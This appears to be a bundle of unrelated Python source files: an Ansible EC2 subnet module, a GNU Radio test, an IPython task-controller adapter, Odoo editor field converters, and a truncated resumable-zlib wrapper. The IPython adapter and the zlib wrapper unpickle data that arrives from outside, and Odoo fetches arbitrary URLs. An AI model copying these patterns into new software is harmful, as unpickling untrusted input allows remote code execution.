author: "Rob White (@wimnat)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value. See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSubnets.html) for possible filters.
required: false
default: null
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
- ec2_vpc_subnet_facts:
- ec2_vpc_subnet_facts:
filters:
subnet-id: subnet-00112233
- ec2_vpc_subnet_facts:
filters:
"tag:Name": Example
- ec2_vpc_subnet_facts:
filters:
vpc-id: vpc-abcdef00
- ec2_vpc_subnet_facts:
filters:
vpc-id: vpc-abcdef00
"tag:Name": "{{ item }}"
with_items:
- publicA
- publicB
- publicC
register: subnet_facts
- set_fact:
subnet_ids: "{{ subnet_facts.results|map(attribute='subnets.0.id')|list }}"
'''
try:
import boto.vpc
from boto.exception import BotoServerError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import AnsibleAWSError, connect_to_aws, ec2_argument_spec, get_aws_connection_info
def get_subnet_info(subnet):
subnet_info = { 'id': subnet.id,
'availability_zone': subnet.availability_zone,
'available_ip_address_count': subnet.available_ip_address_count,
'cidr_block': subnet.cidr_block,
'default_for_az': subnet.defaultForAz,
'map_public_ip_on_launch': subnet.mapPublicIpOnLaunch,
'state': subnet.state,
'tags': subnet.tags,
'vpc_id': subnet.vpc_id
}
return subnet_info
def list_ec2_vpc_subnets(connection, module):
filters = module.params.get("filters")
subnet_dict_array = []
try:
all_subnets = connection.get_all_subnets(filters=filters)
except BotoServerError as e:
module.fail_json(msg=e.message)
for subnet in all_subnets:
subnet_dict_array.append(get_subnet_info(subnet))
module.exit_json(subnets=subnet_dict_array)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
filters = dict(default=None, type='dict')
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.vpc, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
list_ec2_vpc_subnets(connection, module)
if __name__ == '__main__':
main()
|
from gnuradio import gr, gr_unittest, digital, blocks
class test_lms_dd_equalizer(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def transform(self, src_data, gain, const):
SRC = blocks.vector_source_c(src_data, False)
EQU = digital.lms_dd_equalizer_cc(4, gain, 1, const.base())
DST = blocks.vector_sink_c()
self.tb.connect(SRC, EQU, DST)
self.tb.run()
return DST.data()
def test_001_identity(self):
# Constant modulus signal so no adjustments
const = digital.constellation_qpsk()
src_data = const.points()*1000
N = 100 # settling time
expected_data = src_data[N:]
result = self.transform(src_data, 0.1, const)[N:]
N = -500
self.assertComplexTuplesAlmostEqual(expected_data[N:], result[N:], 5)
if __name__ == "__main__":
gr_unittest.run(test_lms_dd_equalizer, "test_lms_dd_equalizer.xml")
|
"""A Foolscap interface to a TaskController.
This class lets Foolscap clients talk to a TaskController.
"""
__docformat__ = "restructuredtext en"
import cPickle as pickle
import xmlrpclib, copy
from zope.interface import Interface, implements
from twisted.internet import defer
from twisted.python import components, failure
from foolscap import Referenceable
from IPython.kernel.twistedutil import blockingCallFromThread
from IPython.kernel import error, task as taskmodule, taskclient
from IPython.kernel.pickleutil import can, uncan
from IPython.kernel.clientinterfaces import (
IFCClientInterfaceProvider,
IBlockingClientAdaptor
)
from IPython.kernel.mapper import (
TaskMapper,
ITaskMapperFactory,
IMapper
)
from IPython.kernel.parallelfunction import (
ParallelFunction,
ITaskParallelDecorator
)
class IFCTaskController(Interface):
"""Foolscap interface to task controller.
See the documentation of `ITaskController` for more information.
"""
def remote_run(binTask):
""""""
def remote_abort(taskid):
""""""
def remote_get_task_result(taskid, block=False):
""""""
def remote_barrier(taskids):
""""""
def remote_spin():
""""""
def remote_queue_status(verbose):
""""""
def remote_clear():
""""""
class FCTaskControllerFromTaskController(Referenceable):
"""
Adapt a `TaskController` to an `IFCTaskController`
This class is used to expose a `TaskController` over the wire using
the Foolscap network protocol.
"""
implements(IFCTaskController, IFCClientInterfaceProvider)
def __init__(self, taskController):
self.taskController = taskController
#---------------------------------------------------------------------------
# Non interface methods
#---------------------------------------------------------------------------
def packageFailure(self, f):
f.cleanFailure()
return self.packageSuccess(f)
def packageSuccess(self, obj):
serial = pickle.dumps(obj, 2)
return serial
#---------------------------------------------------------------------------
# ITaskController related methods
#---------------------------------------------------------------------------
def remote_run(self, ptask):
try:
task = pickle.loads(ptask)
task.uncan_task()
except:
d = defer.fail(pickle.UnpickleableError("Could not unmarshal task"))
else:
d = self.taskController.run(task)
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_abort(self, taskid):
d = self.taskController.abort(taskid)
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_get_task_result(self, taskid, block=False):
d = self.taskController.get_task_result(taskid, block)
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_barrier(self, taskids):
d = self.taskController.barrier(taskids)
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_spin(self):
d = self.taskController.spin()
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_queue_status(self, verbose):
d = self.taskController.queue_status(verbose)
d.addCallback(self.packageSuccess)
d.addErrback(self.packageFailure)
return d
def remote_clear(self):
return self.taskController.clear()
def remote_get_client_name(self):
return 'IPython.kernel.taskfc.FCTaskClient'
components.registerAdapter(FCTaskControllerFromTaskController,
taskmodule.ITaskController, IFCTaskController)
class FCTaskClient(object):
"""
Client class for Foolscap exposed `TaskController`.
This class is an adapter that makes a `RemoteReference` to a
`TaskController` look like an actual `ITaskController` on the client side.
This class also implements `IBlockingClientAdaptor` so that clients can
automatically get a blocking version of this class.
"""
implements(
taskmodule.ITaskController,
IBlockingClientAdaptor,
ITaskMapperFactory,
IMapper,
ITaskParallelDecorator
)
def __init__(self, remote_reference):
self.remote_reference = remote_reference
#---------------------------------------------------------------------------
# Non interface methods
#---------------------------------------------------------------------------
def unpackage(self, r):
return pickle.loads(r)
#---------------------------------------------------------------------------
# ITaskController related methods
#---------------------------------------------------------------------------
def run(self, task):
"""Run a task on the `TaskController`.
See the documentation of the `MapTask` and `StringTask` classes for
details on how to build a task of different types.
:Parameters:
task : an `ITask` implementer
:Returns: The int taskid of the submitted task. Pass this to
`get_task_result` to get the `TaskResult` object.
"""
assert isinstance(task, taskmodule.BaseTask), "task must be a Task object!"
task.can_task()
ptask = pickle.dumps(task, 2)
task.uncan_task()
d = self.remote_reference.callRemote('run', ptask)
d.addCallback(self.unpackage)
return d
def get_task_result(self, taskid, block=False):
"""
Get a task result by taskid.
:Parameters:
taskid : int
The taskid of the task to be retrieved.
block : boolean
Should I block until the task is done?
:Returns: A `TaskResult` object that encapsulates the task result.
"""
d = self.remote_reference.callRemote('get_task_result', taskid, block)
d.addCallback(self.unpackage)
return d
def abort(self, taskid):
"""
Abort a task by taskid.
:Parameters:
taskid : int
The taskid of the task to be aborted.
"""
d = self.remote_reference.callRemote('abort', taskid)
d.addCallback(self.unpackage)
return d
def barrier(self, taskids):
"""Block until a set of tasks are completed.
:Parameters:
taskids : list, tuple
A sequence of taskids to block on.
"""
d = self.remote_reference.callRemote('barrier', taskids)
d.addCallback(self.unpackage)
return d
def spin(self):
"""
Touch the scheduler, to resume scheduling without submitting a task.
This method only needs to be called in unusual situations where the
scheduler is idle for some reason.
"""
d = self.remote_reference.callRemote('spin')
d.addCallback(self.unpackage)
return d
def queue_status(self, verbose=False):
"""
Get a dictionary with the current state of the task queue.
:Parameters:
verbose : boolean
If True, return a list of taskids. If False, simply give
the number of tasks with each status.
:Returns:
A dict with the queue status.
"""
d = self.remote_reference.callRemote('queue_status', verbose)
d.addCallback(self.unpackage)
return d
def clear(self):
"""
Clear all previously run tasks from the task controller.
This is needed because the task controller keep all task results
in memory. This can be a problem is there are many completed
tasks. Users should call this periodically to clean out these
cached task results.
"""
d = self.remote_reference.callRemote('clear')
return d
def adapt_to_blocking_client(self):
"""
Wrap self in a blocking version that implements `IBlockingTaskClient.
"""
from IPython.kernel.taskclient import IBlockingTaskClient
return IBlockingTaskClient(self)
def map(self, func, *sequences):
"""
Apply func to *sequences elementwise. Like Python's builtin map.
This version is load balanced.
"""
return self.mapper().map(func, *sequences)
def mapper(self, clear_before=False, clear_after=False, retries=0,
recovery_task=None, depend=None, block=True):
"""
Create an `IMapper` implementer with a given set of arguments.
The `IMapper` created using a task controller is load balanced.
See the documentation for `IPython.kernel.task.BaseTask` for
documentation on the arguments to this method.
"""
return TaskMapper(self, clear_before=clear_before,
clear_after=clear_after, retries=retries,
recovery_task=recovery_task, depend=depend, block=block)
def parallel(self, clear_before=False, clear_after=False, retries=0,
recovery_task=None, depend=None, block=True):
mapper = self.mapper(clear_before, clear_after, retries,
recovery_task, depend, block)
pf = ParallelFunction(mapper)
return pf
|
"""
Web_editor-context rendering needs to add some metadata to rendered and allow to edit fields,
as well as render a few fields differently.
Also, adds methods to convert values back to Odoo models.
"""
import ast
import base64
import io
import itertools
import json
import logging
import os
import re
import hashlib
import pytz
import requests
from dateutil import parser
from lxml import etree, html
from PIL import Image as I
from werkzeug import urls
import odoo.modules
from odoo import api, models, fields
from odoo.tools import ustr, pycompat
from odoo.tools import html_escape as escape
from odoo.addons.base.ir import ir_qweb
REMOTE_CONNECTION_TIMEOUT = 2.5
logger = logging.getLogger(__name__)
class QWeb(models.AbstractModel):
""" QWeb object for rendering editor stuff
"""
_inherit = 'ir.qweb'
# compile directives
def _compile_directive_snippet(self, el, options):
el.set('t-call', el.attrib.pop('t-snippet'))
name = self.env['ir.ui.view'].search([('key', '=', el.attrib.get('t-call'))]).display_name
thumbnail = el.attrib.pop('t-thumbnail', "oe-thumbnail")
div = u'<div name="%s" data-oe-type="snippet" data-oe-thumbnail="%s">' % (
escape(pycompat.to_text(name)),
escape(pycompat.to_text(thumbnail))
)
return [self._append(ast.Str(div))] + self._compile_node(el, options) + [self._append(ast.Str(u'</div>'))]
def _compile_directive_install(self, el, options):
if self.user_has_groups('base.group_system'):
module = self.env['ir.module.module'].search([('name', '=', el.attrib.get('t-install'))])
if not module or module.state == 'installed':
return []
name = el.attrib.get('string') or 'Snippet'
thumbnail = el.attrib.pop('t-thumbnail', 'oe-thumbnail')
div = u'<div name="%s" data-oe-type="snippet" data-module-id="%s" data-oe-thumbnail="%s"><section/></div>' % (
escape(pycompat.to_text(name)),
module.id,
escape(pycompat.to_text(thumbnail))
)
return [self._append(ast.Str(div))]
else:
return []
def _compile_directive_tag(self, el, options):
if el.get('t-placeholder'):
el.set('t-att-placeholder', el.attrib.pop('t-placeholder'))
return super(QWeb, self)._compile_directive_tag(el, options)
# order and ignore
def _directives_eval_order(self):
directives = super(QWeb, self)._directives_eval_order()
directives.insert(directives.index('call'), 'snippet')
directives.insert(directives.index('call'), 'install')
return directives
class Field(models.AbstractModel):
_name = 'ir.qweb.field'
_inherit = 'ir.qweb.field'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(Field, self).attributes(record, field_name, options, values)
field = record._fields[field_name]
placeholder = options.get('placeholder') or getattr(field, 'placeholder', None)
if placeholder:
attrs['placeholder'] = placeholder
if options['translate'] and field.type in ('char', 'text'):
name = "%s,%s" % (record._name, field_name)
domain = [('name', '=', name), ('res_id', '=', record.id), ('type', '=', 'model'), ('lang', '=', options.get('lang'))]
translation = record.env['ir.translation'].search(domain, limit=1)
attrs['data-oe-translation-state'] = translation and translation.state or 'to_translate'
return attrs
def value_from_string(self, value):
return value
@api.model
def from_html(self, model, field, element):
return self.value_from_string(element.text_content().strip())
class Integer(models.AbstractModel):
_name = 'ir.qweb.field.integer'
_inherit = 'ir.qweb.field.integer'
value_from_string = int
class Float(models.AbstractModel):
_name = 'ir.qweb.field.float'
_inherit = 'ir.qweb.field.float'
@api.model
def from_html(self, model, field, element):
lang = self.user_lang()
value = element.text_content().strip()
return float(value.replace(lang.thousands_sep, '')
.replace(lang.decimal_point, '.'))
class ManyToOne(models.AbstractModel):
_name = 'ir.qweb.field.many2one'
_inherit = 'ir.qweb.field.many2one'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(ManyToOne, self).attributes(record, field_name, options, values)
many2one = getattr(record, field_name)
if many2one:
attrs['data-oe-many2one-id'] = many2one.id
attrs['data-oe-many2one-model'] = many2one._name
return attrs
@api.model
def from_html(self, model, field, element):
Model = self.env[element.get('data-oe-model')]
id = int(element.get('data-oe-id'))
M2O = self.env[field.comodel_name]
field_name = element.get('data-oe-field')
many2one_id = int(element.get('data-oe-many2one-id'))
record = many2one_id and M2O.browse(many2one_id)
if record and record.exists():
# save the new id of the many2one
Model.browse(id).write({field_name: many2one_id})
# not necessary, but might as well be explicit about it
return None
class Contact(models.AbstractModel):
_name = 'ir.qweb.field.contact'
_inherit = 'ir.qweb.field.contact'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(Contact, self).attributes(record, field_name, options, values)
attrs['data-oe-contact-options'] = json.dumps(options)
return attrs
# helper to call the rendering of contact field
@api.model
def get_record_to_html(self, ids, options=None):
return self.value_to_html(self.env['res.partner'].browse(ids[0]), options=options)
class Date(models.AbstractModel):
_name = 'ir.qweb.field.date'
_inherit = 'ir.qweb.field.date'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(Date, self).attributes(record, field_name, options, values)
attrs['data-oe-original'] = record[field_name]
return attrs
@api.model
def from_html(self, model, field, element):
value = element.text_content().strip()
if not value:
return False
return value
class DateTime(models.AbstractModel):
_name = 'ir.qweb.field.datetime'
_inherit = 'ir.qweb.field.datetime'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(DateTime, self).attributes(record, field_name, options, values)
value = record[field_name]
if isinstance(value, pycompat.string_types):
value = fields.Datetime.from_string(value)
if value:
# convert from UTC (server timezone) to user timezone
value = fields.Datetime.context_timestamp(self, timestamp=value)
value = fields.Datetime.to_string(value)
attrs['data-oe-original'] = value
return attrs
@api.model
def from_html(self, model, field, element):
value = element.text_content().strip()
if not value:
return False
# parse from string to datetime
dt = parser.parse(value)
# convert back from user's timezone to UTC
tz_name = self.env.context.get('tz') or self.env.user.tz
if tz_name:
try:
user_tz = pytz.timezone(tz_name)
utc = pytz.utc
dt = user_tz.localize(dt).astimezone(utc)
except Exception:
logger.warn(
"Failed to convert the value for a field of the model"
" %s back from the user's timezone (%s) to UTC",
model, tz_name,
exc_info=True)
# format back to string
return fields.Datetime.to_string(dt)
class Text(models.AbstractModel):
_name = 'ir.qweb.field.text'
_inherit = 'ir.qweb.field.text'
@api.model
def from_html(self, model, field, element):
return html_to_text(element)
class Selection(models.AbstractModel):
_name = 'ir.qweb.field.selection'
_inherit = 'ir.qweb.field.selection'
@api.model
def from_html(self, model, field, element):
value = element.text_content().strip()
selection = field.get_description(self.env)['selection']
for k, v in selection:
if isinstance(v, str):
v = ustr(v)
if value == v:
return k
raise ValueError(u"No value found for label %s in selection %s" % (
value, selection))
class HTML(models.AbstractModel):
_name = 'ir.qweb.field.html'
_inherit = 'ir.qweb.field.html'
@api.model
def from_html(self, model, field, element):
content = []
if element.text:
content.append(element.text)
content.extend(html.tostring(child, encoding='unicode')
for child in element.iterchildren(tag=etree.Element))
return '\n'.join(content)
class Image(models.AbstractModel):
"""
Widget options:
``class``
set as attribute on the generated <img> tag
"""
_name = 'ir.qweb.field.image'
_inherit = 'ir.qweb.field.image'
local_url_re = re.compile(r'^/(?P<module>[^]]+)/static/(?P<rest>.+)$')
@api.model
def from_html(self, model, field, element):
url = element.find('img').get('src')
url_object = urls.url_parse(url)
if url_object.path.startswith('/web/image'):
# url might be /web/image/<model>/<id>[_<checksum>]/<field>[/<width>x<height>]
fragments = url_object.path.split('/')
query = url_object.decode_query()
if fragments[3].isdigit():
model = 'ir.attachment'
oid = fragments[3]
field = 'datas'
else:
model = query.get('model', fragments[3])
oid = query.get('id', fragments[4].split('_')[0])
field = query.get('field', fragments[5])
item = self.env[model].browse(int(oid))
return item[field]
if self.local_url_re.match(url_object.path):
return self.load_local_url(url)
return self.load_remote_url(url)
def load_local_url(self, url):
match = self.local_url_re.match(urls.url_parse(url).path)
rest = match.group('rest')
for sep in os.sep, os.altsep:
if sep and sep != '/':
rest.replace(sep, '/')
path = odoo.modules.get_module_resource(
match.group('module'), 'static', *(rest.split('/')))
if not path:
return None
try:
with open(path, 'rb') as f:
# force complete image load to ensure it's valid image data
image = I.open(f)
image.load()
f.seek(0)
return base64.b64encode(f.read())
except Exception:
logger.exception("Failed to load local image %r", url)
return None
def load_remote_url(self, url):
try:
# should probably remove remote URLs entirely:
# * in fields, downloading them without blowing up the server is a
# challenge
# * in views, may trigger mixed content warnings if HTTPS CMS
# linking to HTTP images
# implement drag & drop image upload to mitigate?
req = requests.get(url, timeout=REMOTE_CONNECTION_TIMEOUT)
# PIL needs a seekable file-like image so wrap result in IO buffer
image = I.open(io.BytesIO(req.content))
# force a complete load of the image data to validate it
image.load()
except Exception:
logger.exception("Failed to load remote image %r", url)
return None
# don't use original data in case weird stuff was smuggled in, with
# luck PIL will remove some of it?
out = io.BytesIO()
image.save(out, image.format)
return base64.b64encode(out.getvalue())
class Monetary(models.AbstractModel):
_name = 'ir.qweb.field.monetary'
_inherit = 'ir.qweb.field.monetary'
@api.model
def from_html(self, model, field, element):
lang = self.user_lang()
value = element.find('span').text.strip()
return float(value.replace(lang.thousands_sep, '')
.replace(lang.decimal_point, '.'))
class Duration(models.AbstractModel):
_name = 'ir.qweb.field.duration'
_inherit = 'ir.qweb.field.duration'
@api.model
def attributes(self, record, field_name, options, values):
attrs = super(Duration, self).attributes(record, field_name, options, values)
attrs['data-oe-original'] = record[field_name]
return attrs
@api.model
def from_html(self, model, field, element):
value = element.text_content().strip()
# non-localized value
return float(value)
class RelativeDatetime(models.AbstractModel):
_name = 'ir.qweb.field.relative'
_inherit = 'ir.qweb.field.relative'
# get formatting from ir.qweb.field.relative but edition/save from datetime
class QwebView(models.AbstractModel):
_name = 'ir.qweb.field.qweb'
_inherit = 'ir.qweb.field.qweb'
def html_to_text(element):
""" Converts HTML content with HTML-specified line breaks (br, p, div, ...)
in roughly equivalent textual content.
Used to replace and fixup the roundtripping of text and m2o: when using
libxml 2.8.0 (but not 2.9.1) and parsing HTML with lxml.html.fromstring
whitespace text nodes (text nodes composed *solely* of whitespace) are
stripped out with no recourse, and fundamentally relying on newlines
being in the text (e.g. inserted during user edition) is probably poor form
anyway.
-> this utility function collapses whitespace sequences and replaces
nodes by roughly corresponding linebreaks
* p are pre-and post-fixed by 2 newlines
* br are replaced by a single newline
* block-level elements not already mentioned are pre- and post-fixed by
a single newline
ought be somewhat similar (but much less high-tech) to aaronsw's html2text.
the latter produces full-blown markdown, our text -> html converter only
replaces newlines by <br> elements at this point so we're reverting that,
and a few more newline-ish elements in case the user tried to add
newlines/paragraphs into the text field
:param element: lxml.html content
:returns: corresponding pure-text output
"""
# output is a list of str | int. Integers are padding requests (in minimum
# number of newlines). When multiple padding requests, fold them into the
# biggest one
output = []
_wrap(element, output)
# remove any leading or tailing whitespace, replace sequences of
# (whitespace)\n(whitespace) by a single newline, where (whitespace) is a
# non-newline whitespace in this case
return re.sub(
r'[ \t\r\f]*\n[ \t\r\f]*',
'\n',
''.join(_realize_padding(output)).strip())
_PADDED_BLOCK = set('p h1 h2 h3 h4 h5 h6'.split())
_MISC_BLOCK = set((
'address article aside audio blockquote canvas dd dl div figcaption figure'
' footer form header hgroup hr ol output pre section tfoot ul video'
).split())
def _collapse_whitespace(text):
""" Collapses sequences of whitespace characters in ``text`` to a single
space
"""
return re.sub('\s+', ' ', text)
def _realize_padding(it):
""" Fold and convert padding requests: integers in the output sequence are
requests for at least n newlines of padding. Runs thereof can be collapsed
into the largest requests and converted to newlines.
"""
padding = 0
for item in it:
if isinstance(item, int):
padding = max(padding, item)
continue
if padding:
yield '\n' * padding
padding = 0
yield item
# leftover padding irrelevant as the output will be stripped
def _wrap(element, output, wrapper=u''):
""" Recursively extracts text from ``element`` (via _element_to_text), and
wraps it all in ``wrapper``. Extracted text is added to ``output``
:type wrapper: basestring | int
"""
output.append(wrapper)
if element.text:
output.append(_collapse_whitespace(element.text))
for child in element:
_element_to_text(child, output)
output.append(wrapper)
def _element_to_text(e, output):
if e.tag == 'br':
output.append(u'\n')
elif e.tag in _PADDED_BLOCK:
_wrap(e, output, 2)
elif e.tag in _MISC_BLOCK:
_wrap(e, output, 1)
else:
# inline
_wrap(e, output)
if e.tail:
output.append(_collapse_whitespace(e.tail))
|
"""Resumable decompression
A ctypes interface to zlib decompress/inflate functions that mimics
zlib.decompressobj interface but also supports getting and setting the
z_stream state to suspend/serialize it and then resume the decompression
at a later time.
"""
import cPickle
import ctypes
import zlib
if zlib.ZLIB_VERSION != '1.2.3.3' and zlib.ZLIB_VERSION != '1.2.3.4':
raise zlib.error("zlib version not supported: %s" % (zlib.ZLIB_VERSION))
if zlib.ZLIB_VERSION == '1.2.3.3':
# from inftrees.h
ENOUGH = 2048
elif zlib.ZLIB_VERSION == '1.2.3.4':
ENOUGH_LENS = 852
ENOUGH_DISTS = 592
ENOUGH = ENOUGH_LENS + ENOUGH_DISTS
Bytefp = ctypes.POINTER(ctypes.c_ubyte)
class GZHeader(ctypes.Structure):
"""gz_header_s structure."""
_fields_ = [
('text', ctypes.c_int),
('time', ctypes.c_ulong),
('xflags', ctypes.c_int),
('os', ctypes.c_int),
('extra', Bytefp),
('extra_len', ctypes.c_uint),
('extra_max', ctypes.c_uint),
('name', Bytefp),
('name_max', ctypes.c_uint),
('comment', Bytefp),
('comm_max', ctypes.c_uint),
('hcrc', ctypes.c_int),
('done', ctypes.c_int),
]
class Code(ctypes.Structure):
"""code structure."""
_fields_ = [
('op', ctypes.c_ubyte),
('bits', ctypes.c_ubyte),
('val', ctypes.c_ushort),
]
if zlib.ZLIB_VERSION == '1.2.3.4':
extra_fields = [
('sane', ctypes.c_int),
('back', ctypes.c_int),
('was', ctypes.c_uint),
]
extra_attr = tuple([i[0] for i in extra_fields])
else:
extra_fields = []
extra_attr = ()
class InflateState(ctypes.Structure):
"""inflate_state structure."""
_fields_ = [
('mode', ctypes.c_int),
('last', ctypes.c_int),
('wrap', ctypes.c_int),
('havedict', ctypes.c_int),
('flags', ctypes.c_int),
('dmax', ctypes.c_uint),
('check', ctypes.c_ulong),
('total', ctypes.c_ulong),
('head', ctypes.POINTER(GZHeader)),
('wbits', ctypes.c_uint),
('wsize', ctypes.c_uint),
('whave', ctypes.c_uint),
('write', ctypes.c_uint),
('window', ctypes.POINTER(ctypes.c_ubyte)),
('hold', ctypes.c_ulong),
('bits', ctypes.c_uint),
('length', ctypes.c_uint),
('offset', ctypes.c_uint),
('extra', ctypes.c_uint),
('lencode', ctypes.POINTER(Code)),
('distcode', ctypes.POINTER(Code)),
('lenbits', ctypes.c_uint),
('distbits', ctypes.c_uint),
('ncode', ctypes.c_uint),
('nlen', ctypes.c_uint),
('ndist', ctypes.c_uint),
('have', ctypes.c_uint),
('next', ctypes.POINTER(Code)),
('lens', ctypes.c_ushort * 320),
('work', ctypes.c_ushort * 288),
('codes', Code * ENOUGH)
] + extra_fields
simple_attr = ('last', 'wrap', 'havedict', 'flags', 'dmax',
'check', 'total', 'wbits', 'wsize', 'whave', 'write',
'hold', 'bits', 'length', 'offset', 'offset',
'extra', 'lenbits', 'distbits', 'ncode', 'nlen',
'ndist', 'have', 'mode') + extra_attr
def get_state(self):
"""Get the state of inflate_state struct."""
# head will be always a NULL pointer, as we use raw in/delfate
state = {}
# first get the pointers offsets
#lencode = ctypes.string_at(self.lencode, ctypes.sizeof(Code))
lencode_addr = ctypes.addressof(self.lencode.contents)
codes_start = ctypes.addressof(self.codes)
lencode = lencode_addr - codes_start
#distcode = ctypes.string_at(self.distcode, ctypes.sizeof(Code))
distcode = ctypes.addressof(self.distcode.contents) - codes_start
#next = ctypes.string_at(self.next, ctypes.sizeof(Code))
next = ctypes.addressof(self.next.contents) - codes_start
# now get the raw memory data
codes = ctypes.string_at(ctypes.pointer(self.codes),
ctypes.sizeof(self.codes))
lens = ctypes.string_at(ctypes.pointer(self.lens),
ctypes.sizeof(self.lens))
work = ctypes.string_at(ctypes.pointer(self.work),
ctypes.sizeof(self.work))
if self.window:
window = ctypes.string_at(self.window, self.wsize)
else:
window = None
if self.head:
raise ValueError("gzip resume isn't supported.")
state = {'lencode': lencode, 'distcode': distcode, 'codes': codes,
'window': window, 'lens': lens, 'work': work, 'next': next,
'head': None}
# now add the basic type attributes to the state dict
for attr_name in self.simple_attr:
state[attr_name] = getattr(self, attr_name)
return state
def set_state(self, old_state, zalloc):
"""Set the state of this inflate state.
@param old_state: the old state dict.
@param zalloc: the zalloc function (in case we need to allocate space
for the window).
"""
if old_state['head']:
raise ValueError("gzip resume isn't supported.")
# set the basic type attributes from the old state dict
for attr_name in self.simple_attr:
setattr(self, attr_name, old_state[attr_name])
# set the data from the array attributes.
ctypes.memmove(ctypes.pointer(self.codes),
ctypes.c_char_p(old_state['codes']),
ctypes.sizeof(self.codes))
ctypes.memmove(ctypes.pointer(self.lens),
ctypes.c_char_p(old_state['lens']),
ctypes.sizeof(self.lens))
ctypes.memmove(ctypes.pointer(self.work),
ctypes.c_char_p(old_state['work']),
ctypes.sizeof(self.work))
# fix the Code pointers
codes_start = ctypes.addressof(self.codes)
self.lencode = ctypes.pointer(
Code.from_address(codes_start + old_state['lencode']))
self.distcode = ctypes.pointer(
Code.from_address(codes_start + old_state['distcode']))
self.next = ctypes.pointer(
Code.from_address(codes_start + old_state['next']))
# set the window
if old_state['window']:
if not self.window:
# we don't have the window mem allocated
addr = zalloc(ctypes.c_uint(1 << self.wbits),
ctypes.sizeof(ctypes.c_ubyte))
self.window = ctypes.cast(addr, ctypes.POINTER(ctypes.c_ubyte))
# set the contents of the window, we don't care about the size as
# in our use case it's always 1<<zlib.MAX_WBITS.
ctypes.memmove(self.window, ctypes.c_char_p(old_state['window']),
1 << self.wbits)
class ResumableZStream(ctypes.Structure):
"""z_stream structure."""
_fields_ = [
("next_in", ctypes.POINTER(ctypes.c_ubyte)),
("avail_in", ctypes.c_uint),
("total_in", ctypes.c_ulong),
("next_out", ctypes.POINTER(ctypes.c_ubyte)),
("avail_out", ctypes.c_uint),
("total_out", ctypes.c_ulong),
("msg", ctypes.c_char_p),
("state", ctypes.POINTER(InflateState)),
("zalloc", ctypes.c_void_p),
("zfree", ctypes.c_void_p),
("opaque", ctypes.c_void_p),
("data_type", ctypes.c_int),
("adler", ctypes.c_ulong),
("reserved", ctypes.c_ulong),
]
def get_state(self):
"""Returns the context as a string."""
# sanity checks
if self.next_in and self.avail_in > 0:
raise ValueError("There are pending bytes to process in next_in")
if self.msg:
raise ValueError("Can't serialize a stream in a error state.")
if self.state:
inflate_state = self.state.contents.get_state()
else:
inflate_state = {}
state = {'total_in': self.total_in,
'total_out': self.total_out,
'avail_in': self.avail_in,
'avail_out': self.avail_out,
'data_type': self.data_type,
'adler': self.adler,
'reserved': self.reserved,
'msg': self.msg,
'state': inflate_state,
'zlib_version': zlib.ZLIB_VERSION}
return cPickle.dumps(state)
def set_state(self, old_state):
"""Set the context with a string of data."""
old_state = cPickle.loads(old_state)
# first check the version
if old_state['zlib_version'] != zlib.ZLIB_VERSION:
raise VersionError("zlib_version: %s, not supported (%s)" %
(old_state['zlib_version'], zlib.ZLIB_VERSION))
# set the data
self.total_in = old_state['total_in']
self.total_out = old_state['total_out']
self.avail_in = old_state['avail_in']
self.avail_out = old_state['avail_out']
self.data_type = old_state['data_type']
self.adler = old_state['adler']
self.reserved = old_state['reserved']
inflate_state = old_state['state']
# build the zalloc function, see zutil.c
zcalloc = ctypes.CFUNCTYPE(ctypes.c_void_p)(self.zalloc)
zalloc = lambda items, size: zcalloc(self.opaque, items, size)
if self.state and inflate_state:
# set the inflate_state state
self.state.contents.set_state(inflate_state, zalloc)
class PyTypeObject(ctypes.Structure):
"""PyTypeObject structure."""
_fields_ = [
("ob_refcnt", ctypes.c_size_t),
("ob_type", ctypes.c_void_p),
("ob_size", ctypes.c_size_t),
("tp_name", ctypes.c_char_p)
]
class PyObject(ctypes.Structure):
"""PyObject structure."""
_fields_ = [
("ob_refcnt", ctypes.c_size_t),
("ob_type", ctypes.POINTER(PyTypeObject))
]
PyObjectPtr = ctypes.POINTER(PyObject)
class CompObject(PyObject):
"""zlibmodule.c CompObject structure."""
_fields_ = [
('zst', ResumableZStream),
('unused_data', PyObjectPtr),
('unconsumed_tail', PyObjectPtr),
('is_initialised', ctypes.c_int)
]
class Decompress(object):
"""A zlib.Decompress wrapper that supports get/setting the state."""
def __init__(self, decompress_obj=None):
if decompress_obj is None:
decompress_obj = zlib.decompressobj()
self._do = decompress_obj
# get the C Decompress object
self._c_do = ctypes.cast(ctypes.c_void_p(id(self._do)),
ctypes.POINTER(CompObject)).contents
@property
def unconsumed_tail(self):
"""The uncosumed tail."""
return self._do.unconsumed_tail
@property
def unused_data(self):
"""The unused_data."""
return self._do.unused_data
def decompress(self, *args, **kwargs):
"""See zlib.decompressobj().decompress method."""
return self._do.decompress(*args, **kwargs)
def flush(self, *args, **kwargs):
"""See zlib.decompressobj().flush method."""
return self._do.flush(*args, **kwargs)
def copy(self):
"""See zlib.decompressobj().copy method."""
return Decompress(self._do.copy())
def set_state(self, z_stream_state):
"""Set the specified z_stream state."""
self._c_do.zst.set_state(z_stream_state)
def get_state(self):
"""Get the current z_stream state."""
